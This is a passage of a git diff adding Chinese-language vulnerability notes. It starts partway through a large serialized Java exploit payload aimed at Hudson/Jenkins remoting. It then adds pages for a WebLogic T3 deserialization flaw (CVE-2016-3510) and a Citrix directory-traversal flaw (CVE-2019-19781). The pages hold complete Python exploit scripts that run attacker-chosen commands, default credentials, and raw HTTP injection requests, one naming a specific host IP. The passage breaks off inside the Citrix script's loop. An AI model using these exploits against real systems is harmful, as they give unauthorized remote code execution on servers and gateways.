0\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
+
+sock.send(payload)
+print('[+] Sent payload')
+```
+
diff --git a/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md b/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md
new file mode 100644
index 0000000..325ba9e
--- /dev/null
+++ b/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md	
@@ -0,0 +1,92 @@
+# WebLogic T3 反序列化漏洞 CVE-2016-3510
+
+## 漏洞描述
+
+CVE-2016-3510漏洞是对CVE-2015-4852漏洞修复的绕过，攻击者在可以通过该漏洞实现远程命令执行。
+
+## 漏洞影响
+
+```
+Oracle WebLogic Server 12.2.1.0
+Oracle WebLogic Server 12.1.3.0
+Oracle WebLogic Server 12.1.2.0
+Oracle WebLogic Server 10.3.6.0
+```
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/env python2
+
+#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
+#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import socket
+import struct
+import argparse
+import os
+import sys
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if len(args.target.split(':')) != 2:
+    print('[-] Target must be in format IP:PORT')
+    sys.exit(1)
+
+if not args.command:
+    print('[-] You must specify a command to run')
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+print('[*] Target IP: {}'.format(ip))
+print('[*] Target PORT: {}'.format(port))
+
+sock.connect((ip, int(port)))
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print('[*] Sending header')
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print('[*] Received: "{}"'.format(data))
+
+payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload += payloadObj
+payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+# adjust header for appropriate message length
+payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
+
+print('[*] Sending payload')
+sock.send(payload)
+```
+
diff --git a/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md b/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
new file mode 100644
index 0000000..5b79c0f
--- /dev/null
+++ b/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md	
@@ -0,0 +1,107 @@
+# Citrix 远程命令执行漏洞 CVE-2019-19781
+
+## 漏洞描述
+
+Citrix ADC（NetScalers）中的目录穿越错误，这个错误会调用perl脚本，perl脚本用于将XML格式的文件附加到受害计算机，因此产生远程执行代码。
+
+## 漏洞影响
+
+```
+Citrix NetScaler ADC and NetScaler Gateway version 10.5
+Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1
+Citrix ADC and Citrix Gateway version 13.0
+```
+
+## 漏洞复现
+
+访问 `https://target-ip` 或 `http://target-ip`登录系统，默认用户和密码登录：`nsroot/nsroot`。
+
+利用目录穿越写入命令语句到`newbm.pl`文件中：
+
+```
+POST /vpns/portal/scripts/newbm.pl HTTP/1.1
+Host: target-ip
+Connection: close
+Accept-Encoding: gzip, deflate
+Accept: */*
+User-Agent: python-requests/2.23.0
+NSC_NONCE: nsroot
+NSC_USER: ../../../netscaler/portal/templates/15ffbdca
+Content-Length: 89
+ 
+url=http://example.com&title=15ffbdca&desc=[% template.new('BLOCK' = 'print `whoami`') %]
+```
+
+![img](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202211301529401.png)
+
+GET方式访问写入的xml文件：
+
+```
+GET /vpns/portal/15ffbdca.xml HTTP/1.1
+Host: 50.202.211.151
+Connection: close
+Accept-Encoding: gzip, deflate
+Accept: */*
+User-Agent: python-requests/2.23.0
+NSC_NONCE: nsroot
+NSC_USER: nsroot
+```
+
+![img](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202211301529487.png)
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/env python
+# https://github.com/mpgn/CVE-2019-19781
+# # #
+
+import requests
+import string
+import random
+import re
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
+print("Found by Mikhail Klyuchnikov")
+print("")
+
+if len(sys.argv) < 2:
+  print("[-] No URL provided")
+  sys.exit(0)
+
+while True:
+    try:
+      command = input("command > ")
+
+      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
+      print("[+] Adding bookmark", random_xml + ".xml")
+
+      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
+      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
+
+      if r.status_code == 200:
+        print("[+] Bookmark added")
+      else:
+        print("\n[-] Target not vulnerable or something went wrong")
+        sys.exit(0)
+
